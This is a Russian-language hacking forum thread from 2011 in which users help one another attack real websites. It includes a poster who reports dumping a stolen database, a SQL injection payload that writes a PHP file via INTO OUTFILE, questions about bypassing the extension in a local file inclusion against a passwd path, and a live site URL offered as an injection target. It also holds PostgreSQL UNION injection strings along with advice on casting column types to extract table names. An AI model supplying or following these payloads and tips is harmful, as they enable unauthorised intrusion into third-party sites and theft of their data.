HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.02.2011, 19:27
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Ребят вытянул дб, сделал экспорт на локалхост, в таблицах есть строки, как сделать сортировку, чтобы повторных значений не было? например строка id_user ...
 
Ответить с цитированием

  #2  
Старый 20.02.2011, 19:28
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

select distinct id_user from....
 
Ответить с цитированием

  #3  
Старый 20.02.2011, 19:30
Vollkorn
Познающий
Регистрация: 06.11.2010
Сообщений: 86
С нами: 8165846

Репутация: -6
По умолчанию

Цитата:
Сообщение от None  
Можешь поподробнее описать, как проверить привелегии и как правильно составить запрос.
Дира где находиться сайт /home/.sites/site1/
Тебе ж уже вроде написали.

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --

А вообще читай /thread43966.html
 
Ответить с цитированием

  #4  
Старый 20.02.2011, 20:22
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Цитата:
Сообщение от Vollkorn  
Здравствуйте. Есть некий сайт, там присутствует local file inclusion, которая дописывает расширение .php. В чем вопрос, знаю можно попытаться отбросить нуль байтом, но когда я пытаюсь это сделать ничего не происходит, еще слышал о 4096 слешах, но даже при их добавлении пишет "Failed opening путь/passwd//////[много слешей]", без расширения. Подскажите пожалуйста что делать.
Этот метод работает не везде.

https://forum.antichat.net/thread98525.html
 
Ответить с цитированием

  #5  
Старый 21.02.2011, 01:45
Slay90
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
С нами: 8990166

Репутация: 14
По умолчанию

ребят такой вопрос, вообщем на одном сайте нашёл скуль инж (_http://www.bittu.org.ru//comtech/?q=node/21), формируется в методом POST если в если в поле логин ввести ковычку, выводит warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/aptech/includes/common.inc(1547) : eval()'d code on line 42.

я не очень понимаю в инъекциях, точнее нихрена я не понимаю, помогите плз! каким образом мне вообще формировать запросы к БД, авторизациями?

P.S если есть какой нибудь добрый дядька кто проконсультирует в этом вопросе, милости прошу icq 3300890.
 
Ответить с цитированием

  #6  
Старый 21.02.2011, 14:30
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

подобрал число колонок на PostgreSQL (PostgreSQL 8.1.11 on i686-pc-linux-gnu)

1+union+select+null,null,null,null,null,null,null, null,null,null,null+--+

сделал

1+union+select+table_name,table_name,table_name,ta ble_name,table_name,table_name,table_name,table_na me,table_name,table_name,table_name+from+informati on_schema.tables+--+

пишет

Query failed: ERROR: UNION types integer and character varying cannot be matched in

Как обойти?
 
Ответить с цитированием

  #7  
Старый 21.02.2011, 14:38
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

ты сначала вывод определи в какой колонке идет..потом уже запрос делай, и еще все зависит от версии постгре...в новых есть INFORMATION_SCHEMA.TABLES а в старых пользуйся PG_TABLES
 
Ответить с цитированием

  #8  
Старый 21.02.2011, 14:55
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Цитата:
Сообщение от noviyuser  
пишет
Query failed: ERROR: UNION types integer and character varying cannot be matched in
Это несовпадение типов данных, вывод напрашивается сам по себе.
 
Ответить с цитированием

  #9  
Старый 21.02.2011, 15:07
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
ты сначала вывод определи в какой колонке идет..потом уже запрос делай, и еще все зависит от версии постгре...в новых есть INFORMATION_SCHEMA.TABLES а в старых пользуйся PG_TABLES
в том то и проблема что не могу определить какое поле выводится, если null,null,null то все нормально а если числовое значение делаю т.е. 1,2,3 и т.д. ошибку выводит

cast(table_name+as+int) тоже не канает
 
Ответить с цитированием

  #10  
Старый 21.02.2011, 15:43
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию

Тип колонки вам придется подбирать вручную типа

Код:
select field1::int, field2::text from ...
и искать текстовое поле для вывода.

ЗЫ. Со статьей /thread35599.html ознакомились?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.